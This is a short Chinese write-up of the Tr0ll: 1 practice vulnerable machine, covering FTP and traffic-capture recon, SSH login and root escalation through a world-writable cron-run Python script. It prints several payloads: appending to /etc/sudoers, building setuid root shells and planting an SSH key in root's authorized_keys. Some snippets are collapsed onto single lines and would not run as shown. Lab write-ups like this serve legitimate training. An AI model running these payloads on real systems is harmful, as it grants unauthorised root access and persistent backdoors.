Tr0ll: 1靶机提点

匿名登录ftp获取数据流量包:
Tr0ll: 1靶机提点_第1张图片
分析流量得到一串字符:
Tr0ll: 1靶机提点_第2张图片
当作目录在网页上访问:
Tr0ll: 1靶机提点_第3张图片
分析foflmao,是一个32位可执行文件,strings一下看到:
Tr0ll: 1靶机提点_第4张图片
同样当作目录来访问:
Tr0ll: 1靶机提点_第5张图片
这里试出来用户名是overflow,密码是Pass.txt。ssh登录之后研究怎么提权,有两种思路,一种是直接内核提,37292
一种是通过ssh连接隔一段时间就会断开这个现象,去分析cronlog,然后发现/lib/log/cleaner.py,这个文件是全局可写的,root权限执行,之后就写这个py文件就可以提权了,下面列举几个脚本:

#!/usr/bin/env python
import os import sys try:
        os.system('echo "overflow ALL=(ALL:ALL) ALL" >> /etc/sudoers') except:
        sys.exit()
#!/usr/bin/env python
import os import sys try:
        os.system('chown root:root /tmp/getroot; chmod 4755 /tmp/getroot') except:
        sys.exit()

下面是先新建这个文件,然后编译为getroot文件,上面就可以使用了
vim getroot.c

int main(void) {
    setgid(0); setuid(0);
    system("/bin/bash");
}
#!/usr/bin/env python
import os import sys try:
        os.system('cp /bin/bash /tmp/bash')
        os.system('chmod 4777 /tmp/bash') except:
        sys.exit()

这里执行bash -p即可提权,如果是写成/bin/sh那么直接执行就可获取root权限
#!/usr/bin/env python
import os import sys try:
        os.system('mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDfjdrW5okibmnT9c3hsAoSZPJ0XcCN92f998ZkCcWehEHXTmpkGJE7qedYSbr78pQITNnIXpVEJXlKYaTQUf68JUKCiBWwLQes3SfHN6SoRe4hiC4LtgtXiUmRIYYY//PXEdgbH7dFvX67fA8p/6Mz/R6ITS4OvHDQCLNwV8wmu46pS4xEq9/Rsp3nc6OjHVWAvnwnBmNTjUWEGuKH5Vvqw5yM0/PV5SeeyaB0R5jm4M7YL1/h8RRVvInt5M20/FaR5wWL4pEeGXsqKPjZUtdCfgPkZwF/4Oi6aOYSKGVmQrnbsetG5F2//IuUTBEkgQp4HevL1hNw3iAH+PNh/iHlVhafeYw9rZ/G9G97vGCsTy7UVYRk55nJQuHTRhZOkt8jAqfBgjLwP/Gn6wXIGWFmSLaKO//jJuSYYVXGIu9vjTGSLEUQtSQKrf+vL94jtGDRYArDnqFvJopj3HJK39B8O2PhVhQ0bh+YbQNWPoHsc5O7UH/6LcREUnppzSKf2yE= kali@kali" >> /root/.ssh/authorized_keys') except:
        sys.exit()

你可能感兴趣的:(安全)